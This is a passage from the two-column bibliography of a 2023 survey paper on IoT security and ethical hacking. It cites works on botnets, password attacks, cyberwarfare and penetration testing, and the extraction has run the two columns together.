RL32331, Washington DC), 2004. Switzerland, 2018.
[128] Hilary Tuttle, Cybercrime costs businesses $11.7 million per year, Risk Manag. 64 [159] Mohammad Tehranipoor, Farinaz Koushanfar, A survey of hardware trojan
(10) (2017), 36–36. taxonomy and detection, IEEE design & test of comput. 27 (1) (2010) 10–25.
[129] The global state of information security survey 2018: pwc. https://www.pw [160] Brett Stone-Gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert,
c.com/us/en/services/consulting/cybersecurity/library/information-security-sur Szydlowski Martin, Richard Kemmerer, Christopher Kruegel, Giovanni Vigna,
vey.html, October 2017. Your botnet is my botnet: analysis of a botnet takeover, in: Proceedings of the 16th
[130] Devin Marsh, Are Ethical Hackers The Best Solution For Combating The Growing ACM Conference on Computer and Communications Security, ACM, 2009,
World Of Cyber-Crime?, PhD thesis University Honors College, Middle Tennessee pp. 635–647.
State University, 2017. [161] Heloise Pieterse, Martin Olivier, Design of a hybrid command and control mobile
[131] Suphannee Sivakorn, Iasonas Polakis, Angelos D. Keromytis, The cracked cookie botnet, J. Inf. Warf. 12 (1) (2013) 70–82.
jar: http cookie hijacking and the exposure of private information, in: 2016 IEEE [162] Arash Habibi Lashkari, Seyedeh Ghazal Ghalebandi, Shahab Alizadeh,
Symposium on Security and Privacy (SP), IEEE, 2016, pp. 724–742. Rohini Devi, Irc botnet major issues and solutions, in: 2011 2nd International
[132] S. Arvind, V Anantha Narayanan, An overview of security in coap: attack and Conference on Networking and Information Technology, vol. 17, IPCSIT, 2011.
analysis, in: 2019 5th International Conference on Advanced Computing & [163] Kassidy Clark, Martijn Warnier, Frances MT. Brazier, Botclouds-the future of
Communication Systems (ICACCS), IEEE, 2019, pp. 655–660. cloud-based botnets, in: CLOSER. Citeseer, 2011.
[133] Zach Shelby, Klaus Hartke, Carsten Bormann, The Constrained Application [164] Ping Wang, Baber Aslam, Cliff C. Zou, Peer-to-peer botnets, in: Handbook of
Protocol (Coap), Technical report, 2014. Information and Communication Security, Springer, 2010, pp. 335–350.
[134] Wolfgang Müller, Evaluating the Security and Resilience of Typical off the Shelf [165] Karim Ahmad, Syed Adeel Ali Shah, Rosli Bin Salleh, Muhammad Arif, Rafidah
Coap Iot Devices: Assessing Coap and Wi-Fi Vulnerabilities, 2022. Md Noor, Mobile botnet attacks–an emerging threat: classification, review and
[135] Muath A. Obaidat, Jian Lim Choong, Kutub Thakur, A secure authentication and open issues, KSII Trans. Internet and Inf. Syst. (TIIS) 9 (4) (2015) 1471–1492.
access control scheme for coap-based iot, in: 2022 5th Conference on Cloud and [166] E Denning Dorothy, Cyberterrorism: the logic bomb versus the truck bomb, Global
Internet of Things (CIoT), IEEE, 2022, pp. 145–149. Dialog. 2 (4) (2000) 29.
[136] Eric Rescorla, Hannes Tschofenig, Nagendra Modadugu, The Datagram Transport [167] Stephen Northcutt, Logic Bombs, Trojan Horses, and Trap Doors, SANS, 2005,
Layer Security (Dtls) Protocol Version 1.3, Internet Engineering Task Force, 2019. pp. 2005–2016.
[137] Jasone Astorga, Marc Barcelo, Aitor Urbieta, Eduardo Jacob, Revisiting the [168] Pele Li, Mehdi Salour, Xiao Su, A survey of internet worm detection and
feasibility of public key cryptography in light of iiot communications, Sensors 22 containment, IEEE Commun. Surv. Tutor. 10 (1) (2008) 20–35.
(7) (2022) 2561. [169] Feri Sulianta, Comparison of the computer viruses from time to time, 10.37178/
[138] Yaron Sheffer, Ralph Holz, Peter Saint Andre, Summarizing Known Attacks on ca-c. 23.1. 139, CENTRAL ASIA AND THE CAUCASUS 23 (1) (2022) 1386–1391.
Transport Layer Security (Tls) and Datagram Tls (Dtls), Technical report, 2015. [170] Peter Szor, The Art of Computer Virus Research and Defense: ART COMP VIRUS
[139] Dahlia Sam, K. Nithya, S. Deepa Kanmani, Adlin Sheeba, A Shamila Ebenezer, B RES DEFENSE _p1, Pearson Education, 2005.
Uma Maheswari, Jennifer Daffodils Amesh, Survey of Risks and Threats in Online [171] Ken Chiang, Levi Lloyd, A case study of the rustock rootkit and spam bot, HotBots
Learning Applications, Secure Data Management for Online Learning Applications, 7 (2007), 10–10.
2023, p. 2. [172] Zhanjun Zhang, Zhongxiao Man, Yong Li, Improving w
ojcik’s eavesdropping
attack on the ping–pong protocol, Phys. Lett. 333 (1–2) (2004) 46–50.

305
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[173] Jr Hubert Rae McLellan, Secure Data Storage with Key Update to Prevent Replay [202] Benoit Dupont, Bots, cops, and corporations: on the limits of enforcement and the
Attacks, US Patent App. 12/015,770, July 23 2009. promise of polycentric regulation as a way to control large-scale cybercrime,
[174] Cheng-I Lai, Alberto Abad, Korin Richmond, Junichi Yamagishi, Najim Dehak, Crime Law Soc. Change 67 (1) (2017) 97–116.
Simon King, Attentive filtering networks for audio replay attack detection, in: [203] Abedelaziz Mohaisen, Alrawi Omar, Unveiling zeus: automated classification of
ICASSP 2019-2019 IEEE International Conference on Acoustics, Speech and Signal malware samples, in: Proceedings of the 22nd International Conference on World
Processing (ICASSP), IEEE, 2019, pp. 6316–6320. Wide Web, ACM, 2013, pp. 829–832.
[175] Meng Liu, Longbiao Wang, Jianwu Dang, Seiichi Nakagawa, Haotian Guan, [204] James P. Farwell, Rafal Rohozinski, Stuxnet and the future of cyber war, Survival
Xiangang Li, Replay attack detection using magnitude and phase information with 53 (1) (2011) 23–40.
attention-based adaptive filters, in: ICASSP 2019-2019 IEEE International [205] Boldizs
ar Bencs
ath, P
ek G
abor, Levente Butty
an, Mark Felegyhazi, The cousins of
Conference on Acoustics, Speech and Signal Processing (ICASSP), IEEE, 2019, stuxnet: Duqu, flame, and gauss, Future Internet 4 (4) (2012) 971–1003.
pp. 6201–6205. [206] A. Coskun Samli, Laurence Jacobs, Counteracting global industrial espionage: a
[176] Callegati Franco, Cerroni Walter, Marco Ramilli, Man-in-the-middle attack to the damage control strategy, Bus. Soc. Rev. 108 (1) (2003) 95–113.
https protocol, IEEE Secur. Priv. 7 (1) (2009) 78–81. [207] Ronald J Deibert, Rafal Rohozinski, A. Manchanda, Nart Villeneuve,
[177] Bhupendra Singh Thakur, Sapna Chaudhary, Content sniffing attack detection in G.M.F. Walton, Tracking Ghostnet: Investigating a Cyber Espionage Network,
client and server side: a survey, Int. J. Adv. Comput. Res. 3 (2) (2013) 7. 2009.
[178] Matt Weir, Sudhir Aggarwal, Breno De Medeiros, Bill Glodek, Password cracking [208] Dmitri Alperovitch, et al., Revealed: Operation Shady RAT, ume 3, McAfee, 2011.
using probabilistic context-free grammars, in: 2009 30th IEEE Symposium on [209] Deana Shick, OMeara Kyle, Unique Approach to Threat Analysis Mapping: A
Security and Privacy, IEEE, 2009, pp. 391–405. Malware Centric Methodology for Better Understanding the Adversary Landscape,
[179] Jim Owens, Jeanna Matthews, A study of passwords and methods used in brute- CARNEGIE-MELLON UNIV PITTSBURGH PA PITTSBURGH United States, 2016.
force ssh attacks, in: USENIX Workshop on Large-Scale Exploits and Emergent Technical report.
Threats, LEET), 2008. [210] Michael L. Gross, Daphna Canetti, Dana R. Vashdi, The psychological effects of
[180] Arvind Narayanan, Vitaly Shmatikov, Fast dictionary attacks on passwords using cyber terrorism, Bull. At. Sci. 72 (5) (2016) 284–291.
time-space tradeoff, in: Proceedings of the 12th ACM Conference on Computer and [211] Mitko Bogdanoski, Drage Petreski, Cyber terrorism–global security threat,
Communications Security, ACM, 2005, pp. 364–372. Contemp. Macedonian Defense-Int. Sci. Defense, Secur. Peace J. 13 (24) (2013)
[181] Hüseyin Demirci, Ali Aydın Selçuk, A meet-in-the-middle attack on 8-round aes, 59–73.
in: International Workshop on Fast Software Encryption, Springer, 2008, [212] Marwan Albahar, Cyber attacks and terrorism: a twenty-first century conundrum,
pp. 116–126. Sci. Eng. Ethics 25 (4) (2019) 993–1006.
[182] Patrick Gage Kelley, Saranga Komanduri, Michelle L. Mazurek, Richard Shay, [213] Jonalan Brickey, Defining cyberterrorism: capturing a broad range of activities in
Timothy Vidas, Lujo Bauer, Nicolas Christin, Lorrie Faith Cranor, Julio Lopez, cyberspace, Combat. Terror. Centre at West Point 5 (8) (2012).
Guess again (and again and again): measuring password strength by simulating [214] Catherine Lotrionte, State sovereignty and self-defense in cyberspace: a normative
password-cracking algorithms, in: 2012 IEEE Symposium on Security and Privacy, framework for balancing legal rights, Emory Int’l L. Rev. 26 (2012) 825.
IEEE, 2012, pp. 523–537. [215] Gregory L. Keeney, Detlof Von Winterfeldt, Identifying and structuring the
[183] Panagiotis Papantonakis, Dionisios Pnevmatikatos, Ioannis Papaefstathiou, objectives of terrorists, Risk Anal.: Int. J. 30 (12) (2010) 1803–1816.
Charalampos Manifavas, Fast, fpga-based rainbow table creation for attacking [216] Mica Endsley, William M. Jones, Situation Awareness Information Dominance &
encrypted mobile communications, in: 2013 23rd International Conference on Information Warfare, LOGICON TECHNICAL SERVICES INC DAYTON OH, 1997.
Field Programmable Logic and Applications, IEEE, 2013, pp. 1–6. Technical report.
[184] Mihir Bellare, Tadayoshi Kohno, Hash function balance and its impact on birthday [217] John Arquilla, Rebuttal cyberwar is already upon us, Foreign Pol. 192 (2012) 84.
attacks, in: International Conference on the Theory and Applications of [218] Jennifer J. Li, Lindsay Daugherty, Training Cyber Warriors: what Can Be Learned
Cryptographic Techniques, Springer, 2004, pp. 401–418. from Defense Language Training? Technical Report, RAND NATIONAL DEFENSE
[185] Sachin Kadloor, Xun Gong, Negar Kiyavash, Tolga Tezcan, Nikita Borisov, Low- RESEARCH INST SANTA MONICA CA, 2015.
cost side channel remote traffic analysis attack in packet networks, in: 2010 IEEE [219] Tom Gjelten, First strike: us cyber warriors seize the offensive, World Aff. 175
International Conference on Communications, IEEE, 2010, pp. 1–5. (2012) 33.
[186] S Praveen Kumar, S. Swapna, Jamming attacks in wireless networks, Int. J. [220] Christina Schori Liang, Cyber jihad: understanding and countering islamic state
Comput. Sci. Netw. Secur. 13 (10) (2013) 110–113. propaganda, GSCP Policy Paper (2) (2015) 4.
[187] Latha Tamilselvan, V. Sankaranarayanan, Prevention of blackhole attack in manet, [221] Andrew James, Kenneth Geers, et al., ‘compelling opponents to our will’: the role
in: The 2nd International Conference on Wireless Broadband and Ultra Wideband of cyber warfare in Ukraine, in: Cyber War in Perspective: Russian Aggression
Communications (AusWireless 2007), IEEE, 2007, 21–21. against Ukraine, NATO CCDCOE, 2015, pp. 39–48.
[188] Adwan Yasin, Mahmoud Abu Zant, Detecting and isolating black-hole attacks in [222] Rain Ottis, Analysis of the 2007 cyber attacks against Estonia from the information
manet using timer based baited technique, Wireless Commun. Mobile Comput. warfare perspective, in: Proceedings of the 7th European Conference on
2018 (2018). Information Warfare, 2008, p. 163.
[189] A. Geetha, N. Sreenath, Byzantine attacks and its security measures in mobile [223] Ian Traynor, Russia accused of unleashing cyberwar to disable Estonia, Guardian
adhoc networks, IJCCIE 2016 (2016). 17 (5) (2007).
[190] Anderson Bergamini de Neira, Burak Kantarci, Michele Nogueira, Distributed [224] Nurgul Yasar, Fatih Mustafa Yasar, Yucel Topcu, Operational advantages of using
Denial of Service Attack Prediction: Challenges, Open Issues and Opportunities, cyber electronic warfare (cew) in the battlefield, in: Cyber Sensing 2012, vol.
Computer Networks, 2023, 109553. 8408, International Society for Optics and Photonics, 2012, 84080G.
[191] Ivan Ristic, Bulletproof SSL and TLS: Understanding and Deploying SSL/TLS and [225] Askin Osman, Riza Irmak, Mustafa Avsever, Cyber warfare and electronic warfare
PKI to Secure Servers and Web Applications, Feisty Duck, 2013. integration in the operational environment of the future: cyber electronic warfare,
[192] Jani Hautakorpi, Gonzalo Camarillo, R. Penfield, Alan Hawrylyshen, in: Cyber Sensing 2015, vol. 9458, International Society for Optics and Photonics,
Medhavi Bhatia, Requirements from Session Initiation Protocol (Sip) Session 2015, 94580H.
Border Control (Sbc) Deployments. RFC5853, IETF, 2010. [226] Elizabeth Van Wie Davis, Shadow Warfare: Cyberwar Policy in the United States,
[193] M. Hasan, Jag Mohan Thakur, Prajoy Podder, Design and implementation of fhss Russia and China, Rowman & Littlefield Publishers, 2021.
and dsss for secure data transmission, Int. j. signal proc. syst. 4 (2) (2016) [227] Keir Giles, The Next Phase of Russian Information Warfare, vol. 20, NATO
144–149. Strategic Communications Centre of Excellence Riga, 2016.
[194] Fahmina Taranum, Ayesha Sarvat, Nooria Ali, Shamekh Siddiqui, Detection and [228] Even Mediu, Nato and Russia in the Balkans, Power Struggle for Influence between
prevention of blackhole node, in: 2020 4th International Conference on Two Security Zones. Case Studies of Albania, Montenegro, and Croatia, PhD thesis,
Electronics, Materials Engineering & Nano-Technology (IEMENTech), IEEE, 2020, Webster University, 2021.
pp. 1–7. [229] Wrightson Tyler, Advanced Persistent Threat Hacking: the Art and Science of
[195] Hanane Kalkha, Satori Hassan, Khalid Satori, Preventing black hole attack in Hacking Any Organization, McGraw-Hill Education Group, 2014.
wireless sensor network using hmm, Proc. Comput. Sci. 148 (2019) 552–561. [230] Jibran Saleem, Bamidele Adebisi, Ande Ruth, Mohammad Hammoudeh, A state of
[196] M.M. Mogunova, Criminal Law Analysis of Cyber Threats in the Business the art survey-impact of cyber attacks on sme's, in: Proceedings of the
Environment, OF OMSK UNIVERSITY, 2021. International Conference on Future Networks and Distributed Systems, 2017.
[197] Shaheen Shariff, Confronting Cyber-Bullying: what Schools Need to Know to [231] Deanna D. Caputo, Shari Lawrence Pfleeger, Jesse D. Freeman, M Eric Johnson,
Control Misconduct and Avoid Legal Consequences, ERIC, 2009. Going spear phishing: exploring embedded training and awareness, IEEE Secur.
[198] Shivender Singh, Anil K. Sarje, Manoj Misra, Client-side counter phishing Priv. 12 (1) (2014) 28–38.
application using adaptive neuro-fuzzy inference system, in: Computational [232] Jason Hong, The state of phishing attacks, Commun. ACM 55 (1) (2012) 74–81.
Intelligence and Communication Networks (CICN), 2012 Fourth International [233] M.T. Chadwick, J.G. Soussan, T.C. Martin, D. Mallick, S.S. Alam, Bank robbery: the
Conference on, IEEE, 2012, pp. 788–792. real losers in the 1998 Bangladesh flood, Land Degrad. Dev. 12 (3) (2001)
[199] Yanping Zhang, Yang Xiao, Kaveh Ghaboosi, Jingyuan Zhang, Hongmei Deng, 251–260.
A survey of cyber crimes, Secur. Commun. Network. 5 (4) (2012) 422–437. [234] Mike Lennon, Hackers Hit 100 Banks in Unprecedented $1 Billion Cyber Heist:
[200] Vadim Kotov, Fabio Massacci, Anatomy of exploit kits, in: International Kaspersky Lab, Security Week, 2015.
Symposium on Engineering Secure Software and Systems, Springer, 2013, [235] Ashish Garg, Jeffrey Curtis, Hilary Halper, Quantifying the financial impact of it
pp. 181–196. security breaches, Inf. Manag. Comput. Secur. 11 (2) (2003) 74–83.
[201] Aditya K. Sood, Richard J. Enbody, Rohit Bansal, Dissecting spyeye–understanding [236] J. Bergal, Hacktivists Launch More Cyberattacks against Local, State Governments,
the design of third generation botnets, Comput. Network. 57 (2) (2013) 436–450. 2017.
[237] Stephen Herzog, Revisiting the Estonian Cyber Attacks: Digital Threats and
Multinational Responses, 2011.

306
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[238] Ellen Nakashima, Russian Government Hackers Penetrated Dnc, Stole Opposition [272] S.G. Rameshkumar, G. Mohan, Counter and timer based baited method for
Research on Trump, 2016. Washington Post online. separating blackhole attacks in manet, Ann. Roman. Soc. Cell Biol. 25 (6) (2021)
[239] D. Maron, Us hospitals not immune to crippling cyber-attacks: outdated systems 897–904.
and earlier breaches underscore America's healthcare data security risks, Sci. Am. [273] Samuel Adu-Gyimah, George Asante, and Oliver Kufuor Boansi. Social engineering
15 (2017). Last modified May. attacks: a clearer perspective. Int. J. Comput. Appl.s, 975:8887.
[240] Lynne Coventry, Dawn Branley, Cybersecurity in healthcare: a narrative review of [274] Kristan Stoddart, Gaining access: attack and defense methods and legacy systems,
trends, threats and ways forward, Maturitas 113 (2018) 48–52. in: Cyberwarfare, Springer, 2022, pp. 227–280.
[241] Jason Andress, Steve Winterfeld, Cyber Warfare: Techniques, Tactics and Tools for [275] Jielin Dong, Network Dictionary, Javvin Technologies Inc., 2007.
Security Practitioners, Elsevier, 2013. [276] E Pike Ronald, The “ethics” of teaching ethical hacking, J. Int. Technol. Inf.
[242] Michael Robinson, Kevin Jones, Helge Janicke, Cyber warfare: issues and Manag. 22 (4) (2013) 4.
challenges, Comput. Secur. 49 (2015) 70–94. [277] Syed A. Saleem, Ethical hacking as a risk management technique, in: Proceedings
[243] Stinissen Jan, Kenneth Geers, A legal framework for cyber operations in Ukraine, of the 3rd Annual Conference on Information Security Curriculum Development,
in: Cyber War in Perspective: Russian Aggression against Ukraine, NATO CCDCOE ACM, 2006, pp. 201–203.
Publications, Tallinn, 2015, pp. 123–134. [278] Bushra Siddiqua Oosman, Ravishankar Dudhe, Review on the ethical and legal
[244] Filiz Katman, The Islamic Republic of Iran's cyber security strategy: challenges in challenges with iot, in: 2021 International Conference on Computational
an era of cyber uncertainty, in: Routledge Companion to Global Cyber-Security Intelligence and Knowledge Economy (ICCIKE), IEEE, 2021, pp. 529–534.
Strategy, Routledge, 2021, pp. 435–447. [279] Leyla Bilge, Tudor Dumitras, Before we knew it: an empirical study of zero-day
[245] Ahmed K. Al-Rawi, Cyber warriors in the middle east: the case of the syrian attacks in the real world, in: Proceedings of the 2012 ACM Conference on
electronic army, Publ. Relat. Rev. 40 (3) (2014) 420–428. Computer and Communications Security, ACM, 2012, pp. 833–844.
[246] Dina Matar, The syrian regime's strategic political communication: practices and [280] Don Coppersmith, Another birthday attack, in: Conference on the Theory and
ideology, Int. J. Commun. 13 (19) (2019). Application of Cryptographic Techniques, Springer, 1985, pp. 14–17.
[247] Kenneth Geers, Darien Kindlund, Ned Moran, Rob Rachwald, World war c: [281] Marc Girault, Robert Cohen, Mireille Campana, A generalized birthday attack, in:
understanding nation-state motives behind today's advanced cyber attacks, Workshop on the Theory and Application of of Cryptographic Techniques,
FireEye, Milpitas, CA, USA, Tech. Rep. Sep (2014). Springer, 1988, pp. 129–156.
[248] Long Cheng, Fang Liu, Danfeng Yao, Enterprise data breach: causes, challenges, [282] Ilsun You, Kangbin Yim, Malware obfuscation techniques: a brief survey, in:
prevention, and future directions, Wiley Interdisciplinary Reviews: Data Min. Broadband, Wireless Computing, Communication and Applications (BWCCA),
Knowl. Discov. 7 (5) (2017), e1211. 2010 International Conference on, IEEE, 2010, pp. 297–300.
[249] Ping Wang, Christopher Johnson, Cybersecurity incident handling: a case study of [283] Alana Maurushat, Ethical Hacking, University of Ottawa Press, 2019.
the equifax data breach, Issues in Information Systems 19 (3) (2018). [284] G.S. Sriram, Security challenges of big data computing, Int. Res. J. Modern. Eng.
[250] Gerhard Eschelbeck, The laws of vulnerabilities, Black Hat Briefings 2606 (2004). Technol. Sci. 4 (1) (2022) 1164–1171.
[251] Zuzana Hromcov
a and Anton Cherepanov. Anatomy of Native Iis Malware. [285] Jean-Paul A. Yaacoub,and Hassan N. Noura, Ola Salman, Ola and Ali Chehab,
[252] Rui Li, Wenrui Diao, Li Zhou, Shishuai Yang, Shuang Li, Shanqing Guo, Android Advanced digital forensics and anti-digital forensics for iot systems: techniques,
Custom Permissions Demystified: A Comprehensive Security Evaluation, IEEE limitations and recommendations, Int. Things 19 (2022), 100544.
Transactions on Software Engineering, 2021. [286] Mark Crosbie, Hack the cloud: ethical hacking and cloud forensics, in: Cloud
[253] S.V. Bezzateev, S.G. Fomicheva, G.A. Zhemelev, Agent-based zerologon Technology: Concepts, Methodologies, Tools, and Applications, IGI Global, 2015,
vulnerability detection, in: 2021 Wave Electronics and its Application in pp. 1510–1526.
Information and Telecommunication Systems (WECONF), IEEE, 2021, pp. 1–5. [287] A Alfred Raja Melvin, G.Jaspher W. Kathrine, S Sudhakar Ilango, S. Vimal,
[254] Shaen Corbet, John W. Goodell, The reputational contagion effects of ransomware Seungmin Rho, Neal N. Xiong, Yunyoung Nam, Dynamic malware attack dataset
attacks, Finance Res. Lett. 47 (2022), 102715. leveraging virtual machine monitor audit data for the detection of intrusions in
[255] Hannah T. Neprash, Claire C. McGlave, Dori A. Cross, Beth A. Virnig, Michael cloud, Trans. Emerg. Telecommun. Technol. 33 (4) (2022) e4287.
A. Puskarich, D Huling Jared, Alan Z. Rozenshtein, Sayeh S. Nikpay, Trends in [288] Ben Rafferty, Dangerous skills gap leaves organisations vulnerable, Netw. Secur.
ransomware attacks on us hospitals, clinics, and other health care delivery 2016 (8) (2016) 11–13.
organizations, 2016-2021, in: JAMA Health Forum, vol. 3, American Medical [289] Jamil Danish, Muhammad Numan Ali Khan, Is ethical hacking ethical, Int. J. Eng.
Association, 2022, e224873 e224873. Sci. Technol. 3 (5) (2011) 3758–3763.
[256] Daniel Votipka, Rock Stevens, Elissa Redmiles, Jeremy Hu, Michelle Mazurek, [290] Philip Brey, Ethical aspects of information security and privacy, in: Security,
Hackers vs. testers: a comparison of software vulnerability discovery processes, in: Privacy, and Trust in Modern Data Management, Springer, 2007, pp. 21–36.
2018 IEEE Symposium on Security and Privacy (SP), IEEE, 2018, pp. 374–391. [291] Georg Thomas, Burmeister Ok, Gregory Low, Issues of implied trust in ethical
[257] Jai Narayan Goel, B.M. Mehtre, Vulnerability assessment & penetration testing as hacking, in: Proceedings of the 28th Australasian Conference on Information
a cyber defence technology, Proc. Comput. Sci. 57 (2015) 710–715. Systems, December, 2017, pp. 4–6.
[258] Rina Elizabeth Lopez De Jimenez, Pentesting on web applications using ethical- [292] Bhawana Sahare, Ankit Naik, Shashikala Khandey, Study of ethical hacking, Int. J.
hacking, in: Central American and Panama Convention (CONCAPAN XXXVI), Comput. Sci. Trends Technol 2 (4) (2014) 6–10.
2016 IEEE 36th, IEEE, 2016, pp. 1–6. [293] Harper Allen, Shon Harris, Jonathan Ness, Chris Eagle, Gideon Lenkey,
[259] Muzhir Shaban Al-Ani, Maha Abd Rajab, Biometrics hand geometry using discrete Terron Williams, Gray Hat Hacking the Ethical Hackers Handbook, McGraw-Hill
cosine transform (dct), Sci. Technol. 3 (4) (2013) 112–117. Osborne Media, 2011.
[260] Anil K. Jain, Ajay Kumar, Biometric recognition: an overview, in: Second [294] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, A Survey on
Generation Biometrics: the Ethical, Legal and Social Context, Springer, 2012, Ethical Hacking: Issues and Challenges, 2021 arXiv preprint arXiv:2103.15072.
pp. 49–79. [295] Keyun Ruan, Cybercrime and Cloud Forensics: Applications for Investigation
[261] Mandy Douglas, Karen Bailey, Mark Leeney, Kevin Curran, An overview of Processes: Applications for Investigation Processes, IGI Global, 2012.
steganography techniques applied to the protection of biometric data, Multimed. [296] Ajinkya A. Farsole, Amurta G. Kashikar, Apurva Zunzunwala, Ethical hacking, Int.
Tool. Appl. 77 (13) (2018) 17333–17373. J. Comput. Appl. 1 (10) (2010) 14–20.
[262] Raphael Hiesgen, Marcin Nawrocki, Thomas C. Schmidt, Matthias W€ahlisch, The [297] Lunne Tom, John JM. Powell, Peter K. Robertson, et al., Cone Penetration Testing
Race to the Vulnerable: Measuring the Log4j Shell Incident, 2022 arXiv preprint in Geotechnical Practice, CRC Press, 2014.
arXiv:2205.02544. [298] James P. McDermott, Attack net penetration testing, in: Proceedings of the 2000
[263] Hritik Gupta, Alka Chaudhary, Anil Kumar, Identification and analysis of log4j Workshop on New Security Paradigms, ACM, 2001, pp. 15–21.
vulnerability, in: 2022 11th International Conference on System Modeling & [299] Thomas M. Chen, Guarding against network intrusions, in: Computer and
Advancement in Research Trends (SMART), IEEE, 2022, pp. 1580–1583. Information Security Handbook, third ed., Elsevier, 2017, pp. 149–163.
[264] Critical vulnerability in Apache log4j library. https://www.riello-ups.com/news [300] Lee Allen, Advanced Penetration Testing for Highly-Secured Environments: the
/14255-critical-vulnerability-in-apache-log4j-library, December 2021. Ultimate Security Guide, Packt Publishing Ltd, 2012.
[265] Kevin J. Houle, Trends in Denial of Service Attack Technology, 2001 archive/pdf/ [301] Thomas J Mowbray, Cybersecurity: Managing Systems, Conducting Testing, and
DoS_trends. pd. Investigating Intrusions, John Wiley & Sons, 2013.
[266] Yien Wang, Jianhua Yang, Ethical hacking and network defense: choose your best [302] Andrew Tang, A guide to penetration testing, Netw. Secur. 2014 (8) (2014) 8–11.
network vulnerability scanning tool, in: Advanced Information Networking and [303] Sven Türpe, J€ orn Eichler, Testing production systems safely: common precautions
Applications Workshops (WAINA), 2017 31st International Conference on, IEEE, in penetration testing, in: 2009 Testing: Academic and Industrial Conference-
2017, pp. 110–113. Practice and Research Techniques, IEEE, 2009, pp. 205–209.
[267] Colin Tankard, Advanced Persistent Threats and How to Monitor and Deter Them, [304] Tracey Caldwell, Ethical hackers: putting on the white hat, Netw. Secur. 2011 (7)
vol. 2011, Network security, 2011, pp. 16–19, 8. (2011) 10–13.
[268] Sa’ed Abed, Reem Jaffal, Bassam Jamil Mohd, A review on blockchain and iot [305] Hessa Mohammed Zaher Al Shebli, Babak D. Beheshti, A study on penetration
integration from energy, security and hardware perspectives, Wireless Pers. testing process and tools, in: Systems, Applications and Technology Conference
Commun. (2023) 1–44. (LISAT), 2018 IEEE Long Island, IEEE, 2018, pp. 1–7.
[269] Jeffrey R. Jones, Estimating software vulnerabilities, IEEE Secur. Priv. 5 (4) (2007) [306] Srinivas Nidhra, Jagruthi Dondeti, Black box and white box testing techniques-a
28–32. literature review, Int. J. Embed. Syst. Appl. (IJESA) 2 (2) (2012) 29–50.
[270] Amas Phillips, Carsten Maple, Florian Lukavsky, Ian Pearson, Michael Richardson, [307] Mohd Ehmer Khan, Farmeena Khan, et al., A comparative study of white box,
Nigel Hanson, Paul Kearney, Robert Dobson, Software Bills of Materials for Iot and black box and grey box testing techniques, Int. J. Adv. Comput. Sci. Appl. 3 (6)
Ot Devices, IoT Security Foundation, 2023. (2012).
[271] Chris Greamo, Anup Ghosh, Sandboxing and virtualization: modern tools for
combating malware, IEEE Secur. Priv. 9 (2) (2011) 79–82.

307
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[308] Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell, State of the art: automated [333] Aaron Guzman, Aditya Gupta, IoT Penetration Testing Cookbook: Identify
black-box web application vulnerability testing, in: 2010 IEEE Symposium on Vulnerabilities and Secure Your Smart Devices, Packt Publishing Ltd, 2017.
Security and Privacy, IEEE, 2010, pp. 332–345. [334] Zhenguo Hu, Razvan Beuran, Yasuo Tan, Automated penetration testing using
[309] Yury Zhauniarovich, Anton Philippov, Olga Gadyatskaya, Crispo Bruno, deep reinforcement learning, in: 2020 IEEE European Symposium on Security and
Fabio Massacci, Towards black box testing of android apps, in: Availability, Privacy Workshops (EuroS&PW), IEEE, 2020, pp. 2–10.
Reliability and Security (ARES), 2015 10th International Conference on, IEEE, [335] Sugandh Shah, B.M. Mehtre, An automated approach to vulnerability assessment
2015, pp. 501–510. and penetration testing using net-nirikshak 1.0, in: Advanced Communication
[310] Henry Raúl Gonz
alez Brito, Raydel Montesino Perurena, Riesgos de seguridad en Control and Computing Technologies (ICACCCT), 2014 International Conference
las pruebas de penetraci
on de aplicaciones web: security risks in web application on, IEEE, 2014, pp. 707–712.
penetration testing, Revista Cubana de Transf. Digit. 2 (2) (2021) 98–117. [336] Jai Narayan Goel, Mohsen Hallaj Asghar, Vivek Kumar, Sudhir Kumar Pandey,
[311] G. Jayasuryapal, P. Meher Pranay, Harpreet Kaur, et al., A survey on network Ensemble based approach to increase vulnerability assessment and penetration
penetration testing, in: 2021 2nd International Conference on Intelligent testing accuracy, in: Innovation and Challenges in Cyber Security (ICICCS-
Engineering and Management (ICIEM), IEEE, 2021, pp. 373–378. INBUSH), 2016 International Conference on, IEEE, 2016, pp. 330–335.
[312] Renas R. Asaad, Penetration testing: wireless network attacks method on kali linux [337] Marc Langheinrich, The internet of thugs? IEEE Pervasive Comput. 20 (3) (2021)
os, Acad. J. Nawroz Univ. 10 (1) (2021) 7–12. 4–6.
[313] Ronald L. Krutz, Russell Dean Vines, Cloud Security: A Comprehensive Guide to [338] Bohdana Sereda, Jason Jaskolka, An evaluation of iot security guidance
Secure Cloud Computing, Wiley Publishing, 2010. documents: a shared responsibility perspective, Proc. Comput. Sci. 201 (2022)
[314] Subashini Subashini, Veeraruna Kavitha, A survey on security issues in service 281–288.
delivery models of cloud computing, J. Netw. Comput. Appl. 34 (1) (2011) 1–11. [339] Barakat Raman, Faruk Catal, Sascha Hackel, Axel Rennoch, Martin A. Schneider,
[315] Harshdeep Singh, Jaswinder Singh, Penetration testing in wireless networks, Int. Towards a certification scheme for iot security evaluation, Informatik 2021
J. Adv. Res. Comput. Sci. 8 (5) (2017). (2021).
[316] Kemal Hajdarevic, Adna Kozic, Indira Avdagic, Zerina Masetic, Nejdet Dogru, [340] Michael Fagan, Katerina Megas, Karen Scarfone, Matthew Smith, Core
Training network managers in ethical hacking techniques to manage resource Cybersecurity Feature Baseline for Securable Iot Devices: A Starting Point for Iot
starvation attacks using gns3 simulator, in: 2017 XXVI International Conference on Device Manufacturers, National Institute of Standards and Technology, 2019.
Information, Communication and Automation Technologies (ICAT), IEEE, 2017, Technical report.
pp. 1–6. [341] Michael Fagan, Michael Fagan, Katerina N. Megas, Karen Scarfone,
[317] Greenwald Lloyd, Robert Shanley, Automated planning for remote penetration Matthew Smith, IoT Device Cybersecurity Capability Core Baseline, US
testing, in: MILCOM 2009-2009 IEEE Military Communications Conference, IEEE, Department of Commerce, National Institute of Standards and Technology, 2020.
